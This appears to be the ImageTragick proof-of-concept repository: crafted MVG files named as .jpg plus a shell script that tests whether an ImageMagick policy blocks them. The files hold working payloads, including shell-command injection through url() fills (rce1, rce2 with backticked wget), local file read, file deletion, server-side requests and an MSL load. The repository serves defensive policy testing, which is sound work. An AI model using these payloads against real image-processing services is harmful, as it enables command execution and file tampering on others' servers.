├── test.png ├── msl.jpg ├── delete.jpg ├── read.jpg ├── localhost_http.jpg ├── rce1.jpg ├── http.jpg ├── msl.xml ├── rce2.jpg ├── README.md └── test.sh /test.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ImageTragick/PoCs/HEAD/test.png -------------------------------------------------------------------------------- /msl.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'msl:msl.xml' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /delete.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'ephemeral:delme' 4 | popgraphic-context 5 | 6 | -------------------------------------------------------------------------------- /read.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'label:@readme' 4 | popgraphic-context 5 | 6 | -------------------------------------------------------------------------------- /localhost_http.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://localhost:PORT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /rce1.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /http.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 
0 0 640 480 3 | fill 'url(http://NONCE.imagetragick.hacker.toys/test.jpg)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /msl.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /rce2.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- google.com > rce2`' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ImageTragick POCs 2 | 3 | ## How To Use 4 | ``` 5 | git clone https://github.com/ImageTragick/PoCs.git 6 | cd PoCs 7 | ./test.sh 8 | ``` 9 | 10 | To test a `policy.xml` file, place it in the script directory and run `test.sh`; the script exports `MAGICK_CONFIGURE_PATH` pointing at its own directory, so that copy is used in preference to the system policy. Besides ImageMagick the script needs `nc` and `curl`, and the nonce check contacts the third-party services `ifconfig.co` (to learn this host's public IP) and `hacker.toys` over the network, so run it only where that outbound traffic is acceptable. 11 | 12 | ## Safe Output 13 | ``` 14 | user@host:~/code/PoCs$ ./test.sh 15 | testing read 16 | SAFE 17 | 18 | testing delete 19 | SAFE 20 | 21 | testing http with local port: 38663 22 | SAFE 23 | 24 | testing http with nonce: a7DyBeV7 25 | SAFE 26 | 27 | testing rce1 28 | SAFE 29 | 30 | testing rce2 31 | SAFE 32 | 33 | testing MSL 34 | SAFE 35 | ``` 36 | 37 | ## Unsafe Output 38 | ``` 39 | user@host:~/code/PoCs$ ./test.sh 40 | testing read 41 | UNSAFE 42 | 43 | testing delete 44 | UNSAFE 45 | 46 | testing http with local port: 44755 47 | UNSAFE 48 | 49 | testing http with nonce: a7DvBer2 50 | UNSAFE 51 | 52 | testing rce1 53 | UNSAFE 54 | 55 | testing rce2 56 | UNSAFE 57 | 58 | testing MSL 59 | UNSAFE 60 | ``` 61 | -------------------------------------------------------------------------------- /test.sh: -------------------------------------------------------------------------------- 1 | #! 
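#!/usr/bin/env bash
#
# ImageTragick policy checker.
#
# Every check feeds one of the crafted MVG files in this directory (the
# *.jpg files here are MVG text, not JPEG) to ImageMagick and then looks for
# the side effect the payload would produce on a vulnerable configuration:
#   read    - label:@readme lets convert render the local file readme
#   delete  - ephemeral:delme removes the file delme
#   http    - a url() fill is fetched from a local dummy listener
#   nonce   - a url() fill for a nonce-tagged hacker.toys name is fetched
#   rce1/2  - shell metacharacters in a URL create a file (rce1 / rce2)
#   MSL     - msl:msl.xml is processed and leaves msl.hax behind
# Output is one "testing ..." line followed by SAFE or UNSAFE per check.
# INCONCLUSIVE is printed instead when a check could not be carried out
# (the nonce check needs outbound network access).
#
# Requirements: ImageMagick (identify/convert, or the IM7 `magick` binary),
# nc, curl, sed, fold and an md5 tool.  A policy.xml placed in this directory
# is used in preference to the system one via MAGICK_CONFIGURE_PATH.
#
# Privacy note: the nonce check asks ifconfig.co for this host's public IP
# and sends the nonce query to hacker.toys; both are third-party services.

set -u

DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"

# The payloads name their helper files (readme, delme, msl.xml) relative to
# ImageMagick's working directory, so every check must run from the script's
# own directory.  Running from elsewhere previously reported SAFE for every
# check simply because the PoC files could not be found.
cd "$DIR" || { echo >&2 "cannot cd to ${DIR}. Aborting."; exit 1; }

# A policy.xml next to this script takes precedence over the system policy.
MAGICK_CONFIGURE_PATH=$DIR
export MAGICK_CONFIGURE_PATH

# Print a message to stderr and exit 1.
die() {
  printf '%s\n' "$*" >&2
  exit 1
}

# ImageMagick 7 ships a single `magick` binary; map the classic names onto it
# when they are absent so the checks below can keep using identify/convert.
if ! command -v identify >/dev/null 2>&1 && command -v magick >/dev/null 2>&1; then
  identify() { magick identify "$@"; }
  convert() { magick "$@"; }
fi
for tool in identify convert; do
  command -v "$tool" >/dev/null 2>&1 \
    || die "I require imagemagick but it's not installed. Aborting."
done
# nc and curl were used without being checked for; a missing nc made the
# local http check print SAFE with no listener at all.
for tool in nc curl sed fold; do
  command -v "$tool" >/dev/null 2>&1 \
    || die "I require ${tool} but it's not installed. Aborting."
done

# Locate an MD5 tool (GNU md5sum or BSD/macOS md5).  It only derives a short
# random nonce; nothing security-relevant depends on it.
MD5SUM_EXE=
for candidate in md5sum md5; do
  if command -v "$candidate" >/dev/null 2>&1; then
    MD5SUM_EXE=$candidate
    break
  fi
done
[[ -n "$MD5SUM_EXE" ]] || die "md5sum/md5 not found. Aborting."

# PID of the dummy HTTP listener while the local http check is running.
LISTENER_PID=

# Run `printf | nc "$@"` in the background and succeed when nc is still alive
# a second later.  Liveness is the only portable signal available; it is not
# proof that the socket is bound.  On failure the child is reaped.
try_listen() {
  printf 'HTTP/1.0 200 OK\n\n' | nc "$@" > requestheaders 2>/dev/null &
  LISTENER_PID=$!
  sleep 1
  if kill -0 "$LISTENER_PID" 2>/dev/null; then
    return 0
  fi
  wait "$LISTENER_PID" 2>/dev/null
  LISTENER_PID=
  return 1
}

# Start the dummy listener on localhost:$1.  OpenBSD-style nc takes
# "-l port"; traditional netcat wants "-l -p port", so the second form is
# tried when the first exits immediately.  (The old `$?` check after `... &`
# tested the success of backgrounding, which is always 0, never the listener.)
start_listener() {
  local port=$1
  try_listen -l "$port" || try_listen -l -p "$port"
}

# Stop the dummy listener if it is still running and reap it.
stop_listener() {
  if [[ -n "$LISTENER_PID" ]] && kill -0 "$LISTENER_PID" 2>/dev/null; then
    kill "$LISTENER_PID" 2>/dev/null
    wait "$LISTENER_PID" 2>/dev/null
  fi
  LISTENER_PID=
}

# Remove every scratch file the checks create, whichever path the script
# exits through, and stop a listener that may still be running.  Stale
# artifacts from an aborted run would otherwise produce a false UNSAFE.
cleanup() {
  stop_listener
  rm -f -- readme readme.png delme requestheaders \
    localhost_http1.jpg http1.jpg rce1 rce2 msl.hax
}
trap cleanup EXIT

# read: label:@readme must not be able to pull a local file into the image.
# convert only produces readme.png when the label was rendered.
test_read() {
  echo "testing read"
  echo "Hello World" > readme
  rm -f readme.png
  convert read.jpg readme.png 2>/dev/null 1>/dev/null
  if [[ -e readme.png ]]; then
    echo "UNSAFE"
    rm -f readme.png
  else
    echo "SAFE"
  fi
  rm -f readme
  echo ""
}

# delete: ephemeral:delme must not remove the file it names.
test_delete() {
  echo "testing delete"
  touch delme
  identify delete.jpg 2>/dev/null 1>/dev/null
  if [[ -e delme ]]; then
    echo "SAFE"
    rm -f delme
  else
    echo "UNSAFE"
  fi
  echo ""
}

# http: a url() fill must not be fetched from a local port.  Any bytes
# captured by the listener mean ImageMagick made the request.
test_local_http() {
  local port=$(( RANDOM + 16384 ))   # random port above 16K
  echo "testing http with local port: ${port}"
  if ! start_listener "$port"; then
    echo >&2 "failed to listen on localhost:${port}"
    exit 1
  fi
  sed "s/PORT/${port}/g" localhost_http.jpg > localhost_http1.jpg
  identify localhost_http1.jpg 2>/dev/null 1>/dev/null
  rm -f localhost_http1.jpg
  # Stop and reap the listener before reading its output so the file is
  # complete; if ImageMagick connected, nc has already served and exited.
  stop_listener
  if [[ -s requestheaders ]]; then
    echo "UNSAFE"
  else
    echo "SAFE"
  fi
  rm -f requestheaders
  echo ""
}

# nonce: a url() fill must not cause an outbound fetch of a nonce-tagged
# hostname.  hacker.toys is asked about the nonce and its answer is searched
# for this host's public IP.  NAT, proxies or egress from a different address
# can hide a real fetch, so SAFE here is weaker evidence than the local check.
test_remote_http() {
  local nonce ip seen
  nonce=$(echo "$RANDOM" | "$MD5SUM_EXE" | fold -w 8 | head -n 1)
  echo "testing http with nonce: ${nonce}"
  ip=$(curl -q -s --max-time 15 ifconfig.co)
  if [[ -z "$ip" ]]; then
    # With an empty IP the grep below would match any non-empty answer and
    # report UNSAFE, or report SAFE with no evidence; neither is a verdict.
    echo "INCONCLUSIVE (could not obtain public IP from ifconfig.co)"
    echo ""
    return
  fi
  sed "s:NONCE:${nonce}:g" http.jpg > http1.jpg
  identify http1.jpg 2>/dev/null 1>/dev/null
  rm -f http1.jpg
  if ! seen=$(curl -q -s --max-time 15 "http://hacker.toys/dns?query=${nonce}.imagetragick"); then
    echo "INCONCLUSIVE (could not query hacker.toys)"
    echo ""
    return
  fi
  # -F: the IP is a literal, not a regex (its dots would otherwise match any
  # character); -- guards against an answer starting with '-'.
  if grep -qF -- "$ip" <<<"$seen"; then
    echo "UNSAFE"
  else
    echo "SAFE"
  fi
  echo ""
}

# Run identify on the PoC $2 and report UNSAFE when the file $3, which only a
# successful payload creates, appears.  $1 is the label printed for the check.
expect_no_artifact() {
  local label=$1 poc=$2 artifact=$3
  echo "testing ${label}"
  rm -f -- "$artifact"   # a leftover from an earlier run is not evidence
  identify "$poc" 2>/dev/null 1>/dev/null
  if [[ -e "$artifact" ]]; then
    echo "UNSAFE"
    rm -f -- "$artifact"
  else
    echo "SAFE"
  fi
  echo ""
}

main() {
  test_read
  test_delete
  test_local_http
  test_remote_http
  # rce1: a quote-breaking url() fill runs `touch rce1`
  expect_no_artifact rce1 rce1.jpg rce1
  # rce2: backticks in an image URL redirect wget output into rce2
  expect_no_artifact rce2 rce2.jpg rce2
  # MSL: msl.jpg loads msl.xml via the msl: coder; msl.hax is the artifact
  # that script is expected to leave behind
  expect_no_artifact MSL msl.jpg msl.hax
}

main "$@"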